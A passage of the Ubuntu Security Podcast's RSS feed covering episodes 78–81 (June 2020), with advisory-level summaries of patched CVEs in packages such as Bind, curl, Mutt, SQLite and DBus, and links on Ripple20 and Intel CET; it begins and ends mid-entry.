<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-talks-cyber-security-policy-with-dr-david-reed-scholar-in-residence-uc-boulder-05-51">Joe talks cyber security policy with Dr David Reed, Scholar in Residence @ UC Boulder [05:51]</h3>
<ul>
<li><a href="https://www.colorado.edu/program/tcp/people/david-reed">https://www.colorado.edu/program/tcp/people/david-reed</a></li>
<li>Stock price study:
<ul>
<li><a href="https://www.comparitech.com/blog/information-security/data-breach-share-price-analysis/">https://www.comparitech.com/blog/information-security/data-breach-share-price-analysis/</a></li>
</ul>
</li>
<li>FCC 5G FAST Plan</li>
<li><a href="https://docs.fcc.gov/public/attachments/DOC-354326A1.pdf">https://docs.fcc.gov/public/attachments/DOC-354326A1.pdf</a></li>
</ul>
<h3 id="ubuntu-security-notices-relocated-27-00">Ubuntu Security Notices relocated [27:00]</h3>
<ul>
<li>Thanks to the design and web teams at Canonical</li>
<li>Notices now live at <a href="https://ubuntu.com/security/notices/">https://ubuntu.com/security/notices/</a></li>
<li>Old notices from <a href="https://usn.ubuntu.com">https://usn.ubuntu.com</a> will get redirected</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E081.mp3" length="27686570" type="audio/mpeg" /><itunes:duration>28:50</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 80
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-80/</link>
          <pubDate>Thu, 25 Jun 2020 15:21:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>15ec5b135c45ce85d4c2975cb29628491ec93321270d8b30640902ea175a8df1e6797dce769708b75a9c244e3374ba6b92057dc2843f176db8004ffbd18c3258</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 80</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week, Sid Faber and Kyle Fazzari of the Ubuntu Robotics team interview
  Vijay Sarvepalli from CERT about the recent Ripple20 vulnerabilities
  announcement, plus we look at security updates for Bind, Mutt, curl and
  more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week, Sid Faber and Kyle Fazzari of the Ubuntu Robotics team interview
  Vijay Sarvepalli from CERT about the recent Ripple20 vulnerabilities
  announcement, plus we look at security updates for Bind, Mutt, curl and
  more.
  </itunes:summary>
        <description>  This week, Sid Faber and Kyle Fazzari of the Ubuntu Robotics team interview
  Vijay Sarvepalli from CERT about the recent Ripple20 vulnerabilities
  announcement, plus we look at security updates for Bind, Mutt, curl and
  more.
  </description>
        <googleplay:description>  This week, Sid Faber and Kyle Fazzari of the Ubuntu Robotics team interview
  Vijay Sarvepalli from CERT about the recent Ripple20 vulnerabilities
  announcement, plus we look at security updates for Bind, Mutt, curl and
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week, Sid Faber and Kyle Fazzari of the Ubuntu Robotics team interview
Vijay Sarvepalli from CERT about the recent Ripple20 vulnerabilities
announcement, plus we look at security updates for Bind, Mutt, curl and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>8 unique CVEs addressed</p>
<h3 id="usn-4397-2-nss-vulnerability-00-40">[<a href="https://usn.ubuntu.com/4397-2/">USN-4397-2</a>] NSS vulnerability [00:40]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12399">CVE-2020-12399</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-79/">Episode 79</a> - timing side-channel attack during DSA key generation</li>
</ul>
<h3 id="usn-4399-1-bind-vulnerabilities-01-00">[<a href="https://usn.ubuntu.com/4399-1/">USN-4399-1</a>] Bind vulnerabilities [01:00]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8619">CVE-2020-8619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8618">CVE-2020-8618</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 DoS issues (resulting from the ability to crash BIND) - an
authoritative nameserver which provides entries containing asterisks
could change entries and cause BIND to crash, also an attacker who can
send crafted zone data to cause a zone transfer could trigger an
assertion failure -&gt; crash</li>
</ul>
<h3 id="usn-4400-1-nfs-utils-vulnerability-01-44">[<a href="https://usn.ubuntu.com/4400-1/">USN-4400-1</a>] nfs-utils vulnerability [01:44]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3689">CVE-2019-3689</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>/var/lib/nfs was writable by statd user - if this user were compromised
could change then contents of this directory. This dir also contains
files owned and managed by root (rmtab etc) - mountd uses rmtab and so
since statd user can change this files contents, they could make mountd
create or overwrite other files on the system as root -&gt; and so escalate
privileges. Fixed to just make the few specific subdirectories owned by
statd.</li>
</ul>
<h3 id="usn-4401-1-mutt-vulnerabilities-03-16">[<a href="https://usn.ubuntu.com/4401-1/">USN-4401-1</a>] Mutt vulnerabilities [03:16]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14154">CVE-2020-14154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14093">CVE-2020-14093</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues on handling of TLS connections for IMAP servers, could allow a
middleperson attack since wouldn&rsquo;t properly do authentication of the
network connection, and would proceed to connect even if a user chooses
to reject the connection due to an expired certificate. So only relevant
if using mutt to connect to IMAP directly.</li>
</ul>
<h3 id="usn-4402-1-curl-vulnerabilities-04-06">[<a href="https://usn.ubuntu.com/4402-1/">USN-4402-1</a>] curl vulnerabilities [04:06]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8177">CVE-2020-8177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8169">CVE-2020-8169</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Could be tricked to overwrite local files as
specified by a malicious server when using the CLI arguments -i in
combination with -J - -J is used to specify that the local filename
should come from a HTTP header specified by the server. Normally this
refuses to overwrite any existing local file <strong>but</strong> when using in
conjunction with -i this check was skipped.</li>
<li>Possible partial password leak since could be tricked into appending part
of the password to the hostname before this is resolved via DNS during a
redirect - but only if the password contains an @ character&hellip;.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="sid-faber-and-kyle-fazzari-interview-vijay-sarvepalli-from-cert-about-ripple20-05-44">Sid Faber and Kyle Fazzari interview Vijay Sarvepalli from CERT about Ripple20 [05:44]</h3>
<ul>
<li><a href="https://www.us-cert.gov/ncas/current-activity/2020/06/16/ripple20-vulnerabilities-affecting-treck-ip-stacks">https://www.us-cert.gov/ncas/current-activity/2020/06/16/ripple20-vulnerabilities-affecting-treck-ip-stacks</a></li>
<li><a href="https://www.us-cert.gov/ics/advisories/icsa-20-168-01">https://www.us-cert.gov/ics/advisories/icsa-20-168-01</a></li>
<li><a href="https://insights.sei.cmu.edu/author/vijay-sarvepalli/">https://insights.sei.cmu.edu/author/vijay-sarvepalli/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E080.mp3" length="27037897" type="audio/mpeg" /><itunes:duration>28:09</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 79
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-79/</link>
          <pubDate>Fri, 19 Jun 2020 16:06:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>069f8ee0d049cb3efe3a8d1c4883fd518ee0d6b95332531af2ce42971cc6b8acfcb31f58cfa9fbf70adc61a7a03d7bda1fd93ade2478f6ead6deb5ae593768e8</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 79</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week Joe discusses Intel's CET announcement with John Johansen, plus
  Alex details recent security fixes including SQLite, fwupd, NSS, DBus and
  more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week Joe discusses Intel's CET announcement with John Johansen, plus
  Alex details recent security fixes including SQLite, fwupd, NSS, DBus and
  more.
  </itunes:summary>
        <description>  This week Joe discusses Intel's CET announcement with John Johansen, plus
  Alex details recent security fixes including SQLite, fwupd, NSS, DBus and
  more.
  </description>
        <googleplay:description>  This week Joe discusses Intel's CET announcement with John Johansen, plus
  Alex details recent security fixes including SQLite, fwupd, NSS, DBus and
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week Joe discusses Intel&rsquo;s CET announcement with John Johansen, plus
Alex details recent security fixes including SQLite, fwupd, NSS, DBus and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-4394-1-sqlite-vulnerabilities-00-56">[<a href="https://usn.ubuntu.com/4394-1/">USN-4394-1</a>] SQLite vulnerabilities [00:56]</h3>
<ul>
<li>9 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13632">CVE-2020-13632</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13631">CVE-2020-13631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13630">CVE-2020-13630</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13435">CVE-2020-13435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13434">CVE-2020-13434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11655">CVE-2020-11655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19645">CVE-2019-19645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19603">CVE-2019-19603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8740">CVE-2018-8740</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref via crafted query, UAF, OOB read, integer overflow when
printing high precision floating point numbers, various minor issues when
handling crafted databases</li>
</ul>
<h3 id="usn-4385-2-intel-microcode-regression-01-43">[<a href="https://usn.ubuntu.com/4385-2/">USN-4385-2</a>] Intel Microcode regression [01:43]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-0549">CVE-2020-0549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0548">CVE-2020-0548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-78/">Episode 78</a> - SRBDS etc - microcode is specific to processors, and is
identified by the triplet of CPU Family, Model and Stepping - this is
listed in /proc/cpuinfo - mine say is 6, 142, 10 - in hex - 06-8E-0A -
would cause a specific Skylake processor type to fail to boot
(06-4e-03) - we reverted this back to the previous release version from
November 2019</li>
</ul>
<h3 id="usn-4395-1-fwupd-vulnerability-03-39">[<a href="https://usn.ubuntu.com/4395-1/">USN-4395-1</a>] fwupd vulnerability [03:39]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10759">CVE-2020-10759</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>A crafted firmware update file could bypass signature verification - in
general not an issue since would need to be able to get in the middle of
firmware updates (which come from LVFS via HTTPS) - so either would need
to compromise LVFS directly or the HTTPS connection to it.
<ul>
<li>Dangling S3 bucket&hellip; :/</li>
</ul>
</li>
<li><a href="https://github.com/justinsteven/advisories/blob/master/2020_fwupd_dangling_s3_bucket_and_CVE-2020-10759_signature_verification_bypass.md">https://github.com/justinsteven/advisories/blob/master/2020_fwupd_dangling_s3_bucket_and_CVE-2020-10759_signature_verification_bypass.md</a></li>
</ul>
<h3 id="usn-4315-2-apport-vulnerabilities-06-11">[<a href="https://usn.ubuntu.com/4315-2/">USN-4315-2</a>] Apport vulnerabilities [06:11]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8833">CVE-2020-8833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8831">CVE-2020-8831</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-70/">Episode 70</a></li>
</ul>
<h3 id="usn-4396-1--usn-dot-ubuntu-dot-com-4396-1--libexif-vulnerabilities-06-24">[<a href="//usn.ubuntu.com/4396-1/">USN-4396-1</a>] libexif vulnerabilities [06:24]</h3>
<ul>
<li>6 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13114">CVE-2020-13114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13113">CVE-2020-13113</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13112">CVE-2020-13112</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0198">CVE-2020-0198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0182">CVE-2020-0182</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0093">CVE-2020-0093</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF due to uninitialised memory, various buffer over-reads, integer
overflow, etc</li>
</ul>
<h3 id="usn-4397-1-nss-vulnerabilities-07-24">[<a href="https://usn.ubuntu.com/4397-1/">USN-4397-1</a>] NSS vulnerabilities [07:24]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12399">CVE-2020-12399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17023">CVE-2019-17023</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible timing side-channel attack during DSA key generation - due to
the difference in time of various operations (dependent on the contents
of the private key) - the key value could be inferred by an attacker</li>
</ul>
<h3 id="usn-4398-1-usn-4398-2-dbus-vulnerability-08-01">[<a href="https://usn.ubuntu.com/4398-1/">USN-4398-1</a>, <a href="https://usn.ubuntu.com/4398-2/">USN-4398-2</a>] DBus vulnerability [08:01]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12049">CVE-2020-12049</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DBus can be used to send file-descriptors - client sends to server via
the dbus daemon - daemon will validate that messages only contain a
certain number of file-descriptors - if too may, will reject BUT fail to
close those file-descriptors - eventually would accumulate too many open
files itself and so the daemon would not be able to accept new
connections -&gt; DoS from a local unprivileged user</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-discusses-intel-cet-with-john-johansen--aka-jj--09-28">Joe discusses Intel CET with John Johansen (aka JJ) [09:28]</h3>
<ul>
<li>
<p>Return Oriented Programming (ROP) <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">https://en.wikipedia.org/wiki/Return-oriented_programming</a></p>
</li>
<li>
<p>Sigreturn Oriented Programming (SROP) (<a href="https://en.wikipedia.org/wiki/Sigreturn-oriented_programming">https://en.wikipedia.org/wiki/Sigreturn-oriented_programming</a></p>
</li>
<li>
<p>Jump/Call Oriented Programming (JOP) <a href="https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/ASIACCS11.pdf">https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/ASIACCS11.pdf</a></p>
</li>
<li>
<p>Control-flow Enforcement technology (CET)</p>
<ul>
<li><a href="https://www.linuxplumbersconf.org/event/2/contributions/147/attachments/72/83/CET-LPC-2018.pdf">https://www.linuxplumbersconf.org/event/2/contributions/147/attachments/72/83/CET-LPC-2018.pdf</a></li>
<li><a href="https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf">https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf</a></li>
</ul>
</li>
<li>
<p>CFI in software</p>
<ul>
<li><a href="https://www.cse.usf.edu/~ligatti/papers/cficcs.pdf">https://www.cse.usf.edu/~ligatti/papers/cficcs.pdf</a></li>
</ul>
</li>
</ul>
<!-- raw HTML omitted -->
<ul>
<li>CET on Linux
<ul>
<li>
<p>Kernel</p>
<ul>
<li><a href="https://lwn.net/Articles/758245/">https://lwn.net/Articles/758245/</a></li>
</ul>
</li>
<li>
<p>gcc</p>
<ul>
<li><a href="https://gcc.gnu.org/git/?p=gcc.git;a=commitdiff;h=8d286dd118a5bd16f7ae0fb9dfcdcfd020bea803">https://gcc.gnu.org/git/?p=gcc.git;a=commitdiff;h=8d286dd118a5bd16f7ae0fb9dfcdcfd020bea803</a></li>
<li><a href="https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=d17cdc17c90ce77cb90c569322c1f241d3530cec">https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=d17cdc17c90ce77cb90c569322c1f241d3530cec</a></li>
<li><a href="https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=d21486483579c2205fcabf1308b155000af86fe1">https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=d21486483579c2205fcabf1308b155000af86fe1</a></li>
<li><a href="https://gcc.gnu.org/git/?p=gcc.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=CET">https://gcc.gnu.org/git/?p=gcc.git&amp;a=search&amp;h=HEAD&amp;st=commit&amp;s=CET</a></li>
</ul>
</li>
<li>
<p>glibc</p>
<ul>
<li><a href="https://sourceware.org/legacy-ml/libc-alpha/2018-08/msg00003.html">https://sourceware.org/legacy-ml/libc-alpha/2018-08/msg00003.html</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<!-- raw HTML omitted -->
<ul>
<li>
<p>LLVM/Clang</p>
<ul>
<li>not just CET, clang has it own CFI not dependent on CET but will support CET</li>
<li><a href="https://clang.llvm.org/docs/ControlFlowIntegrity.html">https://clang.llvm.org/docs/ControlFlowIntegrity.html</a></li>
<li><a href="https://clang.llvm.org/docs/ShadowCallStack.html">https://clang.llvm.org/docs/ShadowCallStack.html</a></li>
</ul>
</li>
<li>
<p>CET on windows</p>
<ul>
<li><a href="https://windows-internals.com/cet-on-windows/">https://windows-internals.com/cet-on-windows/</a></li>
</ul>
</li>
<li>
<p>Pre CET software based CFI on windows</p>
<ul>
<li><a href="https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard">https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard</a></li>
</ul>
</li>
<li>
<p>Papers/talks on attacking CET/CFI</p>
<ul>
<li><a href="https://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Sun-How-to-Survive-the-Hardware-Assisted-Control-Flow-Integrity-Enforcement.pdf">https://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Sun-How-to-Survive-the-Hardware-Assisted-Control-Flow-Integrity-Enforcement.pdf</a></li>
<li><a href="https://windows-internals.com/cet-on-windows/">https://windows-internals.com/cet-on-windows/</a></li>
</ul>
</li>
<li>
<p>Smashing the stack for fun and profit</p>
<ul>
<li><a href="https://www.eecs.umich.edu/courses/eecs588/static/stack_smashing.pdf">https://www.eecs.umich.edu/courses/eecs588/static/stack_smashing.pdf</a></li>
</ul>
</li>
<li>
<p>StackClash</p>
<ul>
<li><a href="https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash">https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash</a></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E079.mp3" length="22108069" type="audio/mpeg" /><itunes:duration>23:01</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 78
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-78/</link>
          <pubDate>Fri, 12 Jun 2020 16:23:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>5930687f6569a7fd92bc06c5860bb5c94dd3073e09e20c5cafbd531a87d0a49f9364181850073bb53c0f388e2a3b31f016fe841a6cb9fe28c7c14b8a125c9065</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 78</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          SRBDS aka CrossTalk, the latest Intel speculative execution attack, is the
  big news this week in security updates for Ubuntu, as well as fixes for
  GnuTLS, Firefox and more, plus Alex and Joe talk about using STRIDE for
  threat modelling...
        
        ]]></itunes:subtitle>
        <itunes:summary>  SRBDS aka CrossTalk, the latest Intel speculative execution attack, is the
  big news this week in security updates for Ubuntu, as well as fixes for
  GnuTLS, Firefox and more, plus Alex and Joe talk about using STRIDE for
  threat modelling of software products.
  </itunes:summary>
        <description>  SRBDS aka CrossTalk, the latest Intel speculative execution attack, is the
  big news this week in security updates for Ubuntu, as well as fixes for
  GnuTLS, Firefox and more, plus Alex and Joe talk about using STRIDE for
  threat modelling of software products.
  </description>
        <googleplay:description>  SRBDS aka CrossTalk, the latest Intel speculative execution attack, is the
  big news this week in security updates for Ubuntu, as well as fixes for
  GnuTLS, Firefox and more, plus Alex and Joe talk about using STRIDE for
  threat modelling of software products.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>SRBDS aka CrossTalk, the latest Intel speculative execution attack, is the
big news this week in security updates for Ubuntu, as well as fixes for
GnuTLS, Firefox and more, plus Alex and Joe talk about using STRIDE for
threat modelling of software products.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>39 unique CVEs addressed</p>
<h3 id="usn-4381-2-django-vulnerabilities-01-00">[<a href="https://usn.ubuntu.com/4381-2/">USN-4381-2</a>] Django vulnerabilities [01:00]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13596">CVE-2020-13596</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13254">CVE-2020-13254</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-77/">Episode 77</a></li>
</ul>
<h3 id="usn-4382-1-freerdp-vulnerabilities-01-28">[<a href="https://usn.ubuntu.com/4382-1/">USN-4382-1</a>] FreeRDP vulnerabilities [01:28]</h3>
<ul>
<li>14 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13398">CVE-2020-13398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13397">CVE-2020-13397</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13396">CVE-2020-13396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11526">CVE-2020-11526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11525">CVE-2020-11525</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11523">CVE-2020-11523</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11522">CVE-2020-11522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11521">CVE-2020-11521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11058">CVE-2020-11058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11049">CVE-2020-11049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11048">CVE-2020-11048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11046">CVE-2020-11046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11045">CVE-2020-11045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11042">CVE-2020-11042</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-77/">Episode 77</a> covered a similar update for FreeRDP2 in 18.04 LTS, 19.10, 20.04 LTS</li>
<li>This is the corresponding update for FreeRDP 1 in 16.04 LTS</li>
</ul>
<h3 id="usn-4383-1-firefox-vulnerabilities-02-09">[<a href="https://usn.ubuntu.com/4383-1/">USN-4383-1</a>] Firefox vulnerabilities [02:09]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12399">CVE-2020-12399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12411">CVE-2020-12411</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12410">CVE-2020-12410</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12409">CVE-2020-12409</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12408">CVE-2020-12408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12407">CVE-2020-12407</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12406">CVE-2020-12406</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12405">CVE-2020-12405</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>77.0.1</li>
</ul>
<h3 id="usn-4384-1-gnutls-vulnerability-02-54">[<a href="https://usn.ubuntu.com/4384-1/">USN-4384-1</a>] GnuTLS vulnerability [02:54]</h3>
<ul>
<li>1 CVEs addressed in Eoan (19.10), Focal (20.04 LTS)
<ul>
